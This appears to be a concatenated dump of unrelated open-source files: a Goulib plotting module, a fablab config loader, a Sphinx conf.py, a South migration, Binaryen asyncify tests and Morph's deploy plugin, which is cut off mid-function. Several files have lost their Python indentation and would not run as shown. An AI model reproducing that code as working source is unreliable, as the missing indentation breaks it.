inspired from http://nbviewer.ipython.org/github/ipython/ipython/blob/3607712653c66d63e0d7f13f073bde8c0f209ba8/docs/examples/notebooks/display_protocol.ipynb
"""
def _plot(self, ax, **kwargs):
"""abstract method, must be overriden
:param ax: `matplotlib.axis`
:return ax: `matplotlib.axis` after plot
"""
raise NotImplementedError(
            'objects derived from plot.Plot must define a _plot method')
return ax
def render(self, fmt='svg', **kwargs):
return render([self], fmt, **kwargs) # call global function
def save(self, filename, **kwargs):
return save([self], filename, **kwargs) # call global function
# for IPython notebooks
def _repr_html_(self):
"""default rich format is svg plot"""
try:
return self._repr_svg_()
except NotImplementedError:
pass
# this returns the same as _repr_png_, but is Table compatible
buffer = self.render('png')
s = base64.b64encode(buffer).decode('utf-8')
return '<img src="data:image/png;base64,%s">' % s
def html(self, **kwargs):
from IPython.display import HTML
return HTML(self._repr_html_(**kwargs))
def svg(self, **kwargs):
from IPython.display import SVG
return SVG(self._repr_svg_(**kwargs))
def _repr_svg_(self, **kwargs):
return self.render(fmt='svg', **kwargs).decode('utf-8')
def png(self, **kwargs):
from IPython.display import Image
return Image(self._repr_png_(**kwargs), embed=True)
def _repr_png_(self, **kwargs):
return self.render(fmt='png', **kwargs)
def plot(self, **kwargs):
""" renders on IPython Notebook
(alias to make usage more straightforward)
"""
return self.svg(**kwargs)
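# Illustrative sketch, not part of Goulib: a minimal Plot subclass showing the
# _plot contract. The class name and the point data it draws are assumptions.
class _ExamplePointPlot(Plot):
    """plots a sequence of (x, y) pairs"""
    def __init__(self, points):
        self.points = points
    def _plot(self, ax, **kwargs):
        # render() passes an 'offset' used to separate superimposed curves;
        # this simple example ignores it and forwards the rest to matplotlib
        kwargs.pop('offset', None)
        xs, ys = zip(*self.points)
        ax.plot(xs, ys, **kwargs)
        return ax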
def render(plotables, fmt='svg', **kwargs):
"""renders several Plot objects"""
import matplotlib.pyplot as plt
# extract optional arguments used for rasterization
printargs, kwargs = itertools2.dictsplit(
kwargs,
['dpi', 'transparent', 'facecolor', 'background', 'figsize']
)
ylim = kwargs.pop('ylim', None)
xlim = kwargs.pop('xlim', None)
title = kwargs.pop('title', None)
fig, ax = plt.subplots()
labels = kwargs.pop('labels', [None] * len(plotables))
# slightly shift the points to make superimposed curves more visible
offset = kwargs.pop('offset', 0)
for i, obj in enumerate(plotables):
if labels[i] is None:
labels[i] = str(obj)
if not title:
try:
title = obj._repr_latex_()
# check that title can be used in matplotlib
from matplotlib.mathtext import MathTextParser
parser = MathTextParser('path').parse(title)
except Exception as e:
title = labels[i]
ax = obj._plot(ax, label=labels[i], offset=i * offset, **kwargs)
if ylim:
plt.ylim(ylim)
if xlim:
plt.xlim(xlim)
ax.set_title(title)
if len(labels) > 1:
ax.legend()
output = io.BytesIO()
fig.savefig(output, format=fmt, **printargs)
data = output.getvalue()
plt.close(fig)
return data
def png(plotables, **kwargs):
from IPython.display import Image
return Image(render(plotables, 'png', **kwargs), embed=True)
def svg(plotables, **kwargs):
from IPython.display import SVG
return SVG(render(plotables, 'svg', **kwargs))
plot = svg
def save(plotables, filename, **kwargs):
ext = filename.split('.')[-1].lower()
kwargs.setdefault('dpi', 600) # force good quality
return open(filename, 'wb').write(render(plotables, ext, **kwargs))
| lgpl-3.0 | 139,288,707,879,006,940 | 29.6 | 161 | 0.611066 | false |
asnt/fablablux-schedule | fablab_schedule/config.py | 1 | 2177 | import logging
import os
from pkg_resources import resource_filename
try:
# Python 3
import configparser
except ImportError:
# Python 2
import ConfigParser as configparser
logger = logging.getLogger(__name__)
config_dir = "/etc/fablab_schedule/"
config_filename = "fablab_schedule.cfg"
example_config_filename = "fablab_schedule.cfg.example"
_config = None
def get_default_config_file_path():
return resource_filename("fablab_schedule",
"conf/" + example_config_filename)
def get_global_config_file_path():
path = os.path.join(config_dir, config_filename)
return path
def parse_float_list(text, delimiter=","):
return [float(value) for value in text.split(delimiter)]
def make_config_dict_from_parser(parser):
config = {}
if "api" in parser:
config["username"] = parser.get("api", "username")
config["password"] = parser.get("api", "password")
config["base_url"] = parser.get("api", "base_url")
if "table" in parser:
config["n_machines"] = parser.getint("table", "n_machines")
config["n_slots"] = parser.getint("table", "n_slots")
row_offsets = parser.get("table", "row_offsets")
config["row_offsets"] = parse_float_list(row_offsets)
column_offsets = parser.get("table", "column_offsets")
config["column_offsets"] = parse_float_list(column_offsets)
config["slot_size"] = parser.getint("table", "slot_size")
if "camera" in parser:
config["vertical_flip"] = parser.getboolean("camera", "vertical_flip")
config["horizontal_flip"] = parser.getboolean("camera",
"horizontal_flip")
return config
def get():
global _config
if _config is None:
parser = configparser.ConfigParser()
parser.read_file(open(get_default_config_file_path()))
parser.read(get_global_config_file_path())
_config = make_config_dict_from_parser(parser)
return _config
def from_file(filepath):
parser = configparser.ConfigParser()
parser.read_file(open(filepath))
return make_config_dict_from_parser(parser)
| gpl-3.0 | -1,449,656,808,628,135,200 | 29.661972 | 78 | 0.638493 | false |
kizbitz/tippet | docs/source/conf.py | 1 | 8141 | # -*- coding: utf-8 -*-
#
# tippet documentation build configuration file, created by
# sphinx-quickstart on Sun Mar 23 09:56:57 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.todo',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'tippet'
copyright = u'2014, Jerry Baker'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.3'
# The full version, including alpha/beta/rc tags.
release = '0.3'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'tippetdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'tippet.tex', u'tippet Documentation',
u'Jerry Baker', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'tippet', u'tippet Documentation',
[u'Jerry Baker'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'tippet', u'tippet Documentation',
u'Jerry Baker', 'tippet', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| apache-2.0 | 3,177,837,327,602,973,700 | 30.311538 | 79 | 0.706301 | false |
elegion/djangodash2012 | fortuitus/fcore/migrations/0003_auto__add_unique_company_slug__add_unique_company_name.py | 1 | 4714 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding unique constraint on 'Company', fields ['slug']
db.create_unique('fcore_company', ['slug'])
# Adding unique constraint on 'Company', fields ['name']
db.create_unique('fcore_company', ['name'])
def backwards(self, orm):
# Removing unique constraint on 'Company', fields ['name']
db.delete_unique('fcore_company', ['name'])
# Removing unique constraint on 'Company', fields ['slug']
db.delete_unique('fcore_company', ['slug'])
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'fcore.company': {
'Meta': {'object_name': 'Company'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique': 'True', 'max_length': '50', 'populate_from': 'None', 'unique_with': '()'})
},
'fcore.fortuitusprofile': {
'Meta': {'object_name': 'FortuitusProfile'},
'company': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['fcore.Company']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
}
}
complete_apps = ['fcore'] | mit | 963,338,552,639,445,400 | 60.233766 | 182 | 0.554518 | false |
WebAssembly/binaryen | test/unit/test_asyncify.py | 2 | 4247 | import os
import subprocess
import tempfile
from scripts.test import shared
from . import utils
class AsyncifyTest(utils.BinaryenTestCase):
def test_asyncify_js(self):
def test(args):
print(args)
shared.run_process(shared.WASM_OPT + args + [self.input_path('asyncify-sleep.wat'), '--asyncify', '-o', 'a.wasm'])
shared.run_process(shared.WASM_OPT + args + [self.input_path('asyncify-coroutine.wat'), '--asyncify', '-o', 'b.wasm'])
shared.run_process(shared.WASM_OPT + args + [self.input_path('asyncify-stackOverflow.wat'), '--asyncify', '-o', 'c.wasm'])
print(' file size: %d' % os.path.getsize('a.wasm'))
if shared.NODEJS:
shared.run_process([shared.NODEJS, self.input_path('asyncify.js')])
test(['-g'])
test([])
test(['-O1'])
test(['--optimize-level=1'])
test(['-O3'])
test(['-Os', '-g'])
def test_asyncify_pure_wasm(self):
def test(input_file):
shared.run_process(shared.WASM_OPT + [input_file, '--asyncify', '-o', 'a.wasm'])
shared.run_process(shared.WASM_DIS + ['a.wasm', '-o', 'a.wat'])
output = shared.run_process(shared.WASM_SHELL + ['a.wat'], capture_output=True).stdout
with open(self.input_path('asyncify-pure.txt'), 'r') as f:
self.assert_equal_ignoring_line_endings(f.read(), output)
# test wat input
wat = self.input_path('asyncify-pure.wat')
test(wat)
# test wasm input
shared.run_process(shared.WASM_AS + [wat, '-o', 'a.wasm'])
test('a.wasm')
def test_asyncify_list_bad(self):
for arg, warning in [
('--pass-arg=asyncify-removelist@nonexistent', 'nonexistent'),
('--pass-arg=asyncify-onlylist@nonexistent', 'nonexistent'),
('--pass-arg=asyncify-removelist@main', None),
('--pass-arg=asyncify-onlylist@main', None),
('--pass-arg=asyncify-removelist@m*n', None),
('--pass-arg=asyncify-onlylist@m*n', None),
('--pass-arg=asyncify-onlylist@main*', None),
('--pass-arg=asyncify-onlylist@*main', None),
('--pass-arg=asyncify-removelist@non*existent', 'non*existent'),
('--pass-arg=asyncify-onlylist@non*existent', 'non*existent'),
('--pass-arg=asyncify-onlylist@DOS_ReadFile(unsigned short, unsigned char*, unsigned short*, bool)', None),
]:
print(arg, warning)
err = shared.run_process(shared.WASM_OPT + ['-q', self.input_path('asyncify-pure.wat'), '--asyncify', arg], stdout=subprocess.PIPE, stderr=subprocess.PIPE).stderr.strip()
if warning:
self.assertIn('warning', err)
self.assertIn(warning, err)
else:
self.assertNotIn('warning', err)
def test_asyncify_onlylist_and_other(self):
def test(list_name):
args = shared.WASM_OPT + [self.input_path('asyncify-pure.wat'),
'--asyncify',
'--pass-arg=asyncify-onlylist@main',
'--pass-arg=asyncify-%slist@main' % list_name]
proc = shared.run_process(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, check=False)
self.assertNotEqual(proc.returncode, 0, 'must error on using both lists at once')
self.assertIn('It makes no sense to use both an asyncify only-list together with another list', proc.stdout)
test('remove')
test('add')
def test_asyncify_imports(self):
def test(args):
return shared.run_process(shared.WASM_OPT + [self.input_path('asyncify-sleep.wat'), '--asyncify', '--print'] + args, stdout=subprocess.PIPE).stdout
normal = test(['[email protected]'])
temp = tempfile.NamedTemporaryFile().name
with open(temp, 'w') as f:
f.write('env.sleep')
response = test(['--pass-arg=asyncify-imports@@%s' % temp])
self.assertEqual(normal, response)
without = test(['[email protected]'])
self.assertNotEqual(normal, without)
| apache-2.0 | -1,870,686,835,276,587,000 | 46.719101 | 182 | 0.5757 | false |
nuxeh/morph | morphlib/plugins/deploy_plugin.py | 1 | 29928 | # Copyright (C) 2013-2015 Codethink Limited
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
import json
import logging
import os
import shutil
import sys
import tarfile
import tempfile
import uuid
import cliapp
import morphlib
class DeployPlugin(cliapp.Plugin):
def enable(self):
group_deploy = 'Deploy Options'
self.app.settings.boolean(['upgrade'],
'specify that you want to upgrade an '
'existing cluster. Deprecated: use the '
'`morph upgrade` command instead',
group=group_deploy)
self.app.add_subcommand(
'deploy', self.deploy,
arg_synopsis='CLUSTER [DEPLOYMENT...] [SYSTEM.KEY=VALUE]')
self.app.add_subcommand(
'upgrade', self.upgrade,
arg_synopsis='CLUSTER [DEPLOYMENT...] [SYSTEM.KEY=VALUE]')
def disable(self):
pass
def deploy(self, args):
'''Deploy a built system image or a set of images.
Command line arguments:
* `CLUSTER` is the name of the cluster to deploy.
* `DEPLOYMENT...` is the name of zero or more deployments in the
morphology to deploy. If none are specified then all deployments
in the morphology are deployed.
* `SYSTEM.KEY=VALUE` can be used to assign `VALUE` to a parameter
named `KEY` for the system identified by `SYSTEM` in the cluster
morphology (see below). This will override parameters defined
in the morphology.
Morph deploys a set of systems listed in a cluster morphology.
"Deployment" here is quite a general concept: it covers anything
where a system image is taken, configured, and then put somewhere
where it can be run. The deployment mechanism is quite flexible,
and can be extended by the user.
A cluster morphology defines a list of systems to deploy, and
for each system a list of ways to deploy them. It contains the
following fields:
* **name**: MUST be the same as the basename of the morphology
filename, sans .morph suffix.
* **kind**: MUST be `cluster`.
* **systems**: a list of systems to deploy;
the value is a list of mappings, where each mapping has the
following keys:
* **morph**: the system morphology to use in the specified
commit.
* **deploy**: a mapping where each key identifies a
system and each system has at least the following keys:
              * **type**: identifies the type of deployment e.g. (kvm,
                nfsboot) (see below).
* **location**: where the deployed system should end up
at. The syntax depends on the deployment type (see below).
Any additional item on the dictionary will be added to the
environment as `KEY=VALUE`.
* **deploy-defaults**: allows multiple deployments of the same
system to share some settings, when they can. Default settings
will be overridden by those defined inside the deploy mapping.
# Example
name: cluster-foo
kind: cluster
systems:
- morph: devel-system-x86_64-generic.morph
deploy:
cluster-foo-x86_64-1:
type: kvm
location: kvm+ssh://user@host/x86_64-1/x86_64-1.img
HOSTNAME: cluster-foo-x86_64-1
DISK_SIZE: 4G
RAM_SIZE: 4G
VCPUS: 2
- morph: devel-system-armv7-highbank
deploy-defaults:
type: nfsboot
location: cluster-foo-nfsboot-server
deploy:
cluster-foo-armv7-1:
HOSTNAME: cluster-foo-armv7-1
cluster-foo-armv7-2:
HOSTNAME: cluster-foo-armv7-2
Each system defined in a cluster morphology can be deployed in
multiple ways (`type` in a cluster morphology). Morph provides
the following types of deployment:
* `tar` where Morph builds a tar archive of the root file system.
* `rawdisk` where Morph builds a raw disk image and sets up the
image with a bootloader and configuration so that it can be
booted. Disk size is set with `DISK_SIZE` (see below).
* `virtualbox-ssh` where Morph creates a VirtualBox disk image,
and creates a new virtual machine on a remote host, accessed
over ssh. Disk and RAM size are set with `DISK_SIZE` and
`RAM_SIZE` (see below).
* `kvm`, which is similar to `virtualbox-ssh`, but uses libvirt
and KVM instead of VirtualBox. Disk and RAM size are set with
`DISK_SIZE` and `RAM_SIZE` (see below).
* `nfsboot` where Morph creates a system to be booted over
a network.
* `ssh-rsync` where Morph copies a binary delta over to the target
system and arranges for it to be bootable. This requires
`system-version-manager` from the tbdiff chunk
* `initramfs`, where Morph turns the system into an initramfs image,
suitable for being used as the early userland environment for a
system to be able to locate more complicated storage for its root
file-system, or on its own for diskless deployments.
There are additional extensions that currently live in the Baserock
definitions repo (baserock:baserock/definitions). These include:
* `image-package` where Morph creates a tarball that includes scripts
that can be used to make disk images outside of a Baserock
environment. The example in definitions.git will create scripts for
generating disk images and installing to existing disks.
        * `sdk` where Morph generates something resembling a BitBake SDK, which
provides a toolchain for building software to target a system built
by Baserock, from outside of a Baserock environment. This creates a
          self-extracting shell archive that you pass a directory to extract
          to; inside it there is a shell snippet called
          environment-setup-$TARGET which can be used to set environment
variables to use the toolchain.
* `pxeboot` where Morph temporarily network-boots the system you are
deploying, so it can install a more permanent system onto local
storage.
In addition to the deployment type, the user must also give
a value for `location`. Its syntax depends on the deployment
types. The deployment types provided by Morph use the
following syntaxes:
* `tar`: pathname to the tar archive to be created; for
example, `/home/alice/testsystem.tar`
* `rawdisk`: pathname to the disk image to be created; for
example, `/home/alice/testsystem.img`
* `virtualbox-ssh` and `kvm`: a custom URL scheme that
provides the target host machine (the one that runs
VirtualBox or `kvm`), the name of the new virtual machine,
and the location on the target host of the virtual disk
file. The target host is accessed over ssh. For example,
`vbox+ssh://[email protected]/testsys/home/alice/testsys.vdi`
or `kvm+ssh://[email protected]/testsys/home/alice/testys.img`
where
* `[email protected]` is the target as given to ssh,
**from within the development host** (which may be
different from the target host's normal address);
* `testsys` is the new VM's name;
* `/home/alice/testsys.vdi` and `/home/alice/testys.img` are
the pathnames of the disk image files on the target host.
* `nfsboot`: the address of the nfsboot server. (Note this is just
the _address_ of the trove, _not_ `user@...`, since `root@` will
automatically be prepended to the server address.)
        In addition to the `location` parameter, deployments can take additional
`KEY=VALUE` parameters. These can be provided in the following ways:
1. In the cluster definition file, e.g.
...
systems:
- morph: systems/foo-system.morph
deploy:
foo:
HOSTNAME: foo
2. In the environment before running e.g.
`HOSTNAME=foo morph deploy ...`
3. On the command-line e.g.
`morph deploy clusters/foo.morph foo.HOSTNAME=foo`
        For any boolean `KEY=VALUE` parameters, allowed values are:
        * positive: `yes`, `1`, `true`;
        * negative: `no`, `0`, `false`.
The following `KEY=VALUE` parameters are supported for `rawdisk`,
`virtualbox-ssh` and `kvm` and deployment types:
* `DISK_SIZE=X` to set the size of the disk image. `X` should use a
suffix of `K`, `M`, or `G` (in upper or lower case) to indicate
kilo-, mega-, or gigabytes. For example, `DISK_SIZE=100G` would
create a 100 gigabyte disk image. **This parameter is mandatory**.
        The `kvm` and `virtualbox-ssh` deployment types support these
        additional parameters:
* `RAM_SIZE=X` to set the size of virtual RAM for the virtual
machine. `X` is interpreted in the same was as `DISK_SIZE`,
and defaults to `1G`.
* `AUTOSTART=<VALUE>` - allowed values are `yes` and `no`
(default)
For the `nfsboot` write extension,
* the following `KEY=VALUE` pairs are mandatory
* `NFSBOOT_CONFIGURE=yes` (or any non-empty value). This
enables the `nfsboot` configuration extension (see
below) which MUST be used when using the `nfsboot`
write extension.
* `HOSTNAME=<STRING>` a unique identifier for that system's
`nfs` root when it's deployed on the nfsboot server - the
extension creates a directory with that name for the `nfs`
root, and stores kernels by that name for the tftp server.
* the following `KEY=VALUE` pairs are optional
* `VERSION_LABEL=<STRING>` - set the name of the system
version being deployed, when upgrading. Defaults to
"factory".
Each deployment type is implemented by a **write extension**. The
ones provided by Morph are listed above, but users may also
create their own by adding them in the same git repository
and branch as the system morphology. A write extension is a
script that does whatever is needed for the deployment. A write
extension is passed two command line parameters: the name of an
unpacked directory tree that contains the system files (after
configuration, see below), and the `location` parameter.
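        As an illustrative sketch only (not one of the extensions shipped
        with Morph), a write extension that simply archives the configured
        system tree could look like the following; the filename is an
        assumption:
            #!/usr/bin/env python
            # tarball.write: sys.argv[1] is the unpacked system tree,
            # sys.argv[2] is the `location` value from the cluster.
            import sys
            import tarfile
            system_tree, location = sys.argv[1], sys.argv[2]
            tar = tarfile.open(location, 'w')
            tar.add(system_tree, arcname='.')
            tar.close()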
Regardless of the type of deployment, the image may be
configured for a specific deployment by using **configuration
extensions**. The extensions are listed in the system morphology
file:
...
configuration-extensions:
- set-hostname
The above specifies that the extension `set-hostname` is to
be run. Morph will run all the configuration extensions listed
in the system morphology, and no others. (This way, configuration
is more easily tracked in git.)
Configuration extensions are scripts that get the unpacked
directory tree of the system as their parameter, and do whatever
is needed to configure the tree.
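        As a sketch only (again, not a built-in extension), a configuration
        extension that records a value inside the system tree might look
        like this; `DEPLOYMENT_ID` is a made-up variable passed as a
        `KEY=VALUE` parameter:
            #!/usr/bin/env python
            # example.configure: sys.argv[1] is the unpacked system tree.
            import os
            import sys
            tree = sys.argv[1]
            with open(os.path.join(tree, 'etc', 'deployment-id'), 'w') as f:
                f.write(os.environ.get('DEPLOYMENT_ID', 'unknown'))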
        Morph provides the following configuration extensions built in:
* `set-hostname` sets the hostname of the system to the value
of the `HOSTNAME` variable.
* `nfsboot` configures the system for nfsbooting. This MUST
be used when deploying with the `nfsboot` write extension.
Any `KEY=VALUE` parameters given in `deploy` or `deploy-defaults`
sections of the cluster morphology, or given through the command line
are set as environment variables when either the configuration or the
write extension runs (except `type` and `location`).
Deployment configuration is stored in the deployed system as
/baserock/deployment.meta. THIS CONTAINS ALL ENVIRONMENT VARIABLES SET
DURING DEPLOYMENT, so make sure you have no sensitive information in
your environment that is being leaked. As a special case, any
environment/deployment variable that contains 'PASSWORD' in its name is
stripped out and not stored in the final system.
'''
# Nasty hack to allow deploying things of a different architecture
def validate(self, root_artifact):
pass
morphlib.buildcommand.BuildCommand._validate_architecture = validate
if not args:
raise cliapp.AppException(
'Too few arguments to deploy command (see help)')
# Raise an exception if there is not enough space in tempdir
# / for the path and 0 for the minimum size is a no-op
# it exists because it is complicated to check the available
# disk space given dirs may be on the same device
morphlib.util.check_disk_available(
self.app.settings['tempdir'],
self.app.settings['tempdir-min-space'],
'/', 0)
ws = morphlib.workspace.open('.')
sb = morphlib.sysbranchdir.open_from_within('.')
cluster_filename = morphlib.util.sanitise_morphology_path(args[0])
cluster_filename = sb.relative_to_root_repo(cluster_filename)
build_uuid = uuid.uuid4().hex
build_command = morphlib.buildcommand.BuildCommand(self.app)
build_command = self.app.hookmgr.call('new-build-command',
build_command)
loader = morphlib.morphloader.MorphologyLoader()
name = morphlib.git.get_user_name(self.app.runcmd)
email = morphlib.git.get_user_email(self.app.runcmd)
build_ref_prefix = self.app.settings['build-ref-prefix']
root_repo_dir = morphlib.gitdir.GitDirectory(
sb.get_git_directory_name(sb.root_repository_url))
cluster_text = root_repo_dir.read_file(cluster_filename)
cluster_morphology = loader.load_from_string(cluster_text,
filename=cluster_filename)
if cluster_morphology['kind'] != 'cluster':
raise cliapp.AppException(
"Error: morph deployment commands are only supported for "
"cluster morphologies.")
# parse the rest of the args
all_subsystems = set()
all_deployments = set()
deployments = set()
for system in cluster_morphology['systems']:
all_deployments.update(system['deploy'].iterkeys())
if 'subsystems' in system:
all_subsystems.update(loader._get_subsystem_names(system))
for item in args[1:]:
if not item in all_deployments:
break
deployments.add(item)
env_vars = args[len(deployments) + 1:]
self.validate_deployment_options(
env_vars, all_deployments, all_subsystems)
if self.app.settings['local-changes'] == 'include':
bb = morphlib.buildbranch.BuildBranch(sb, build_ref_prefix)
pbb = morphlib.buildbranch.pushed_build_branch(
bb, loader=loader, changes_need_pushing=False,
name=name, email=email, build_uuid=build_uuid,
status=self.app.status)
with pbb as (repo, commit, original_ref):
self.deploy_cluster(build_command, cluster_morphology,
root_repo_dir, repo, commit, env_vars,
deployments)
else:
repo = sb.get_config('branch.root')
ref = sb.get_config('branch.name')
commit = root_repo_dir.resolve_ref_to_commit(ref)
self.deploy_cluster(build_command, cluster_morphology,
root_repo_dir, repo, commit, env_vars,
deployments)
self.app.status(msg='Finished deployment')
def validate_deployment_options(
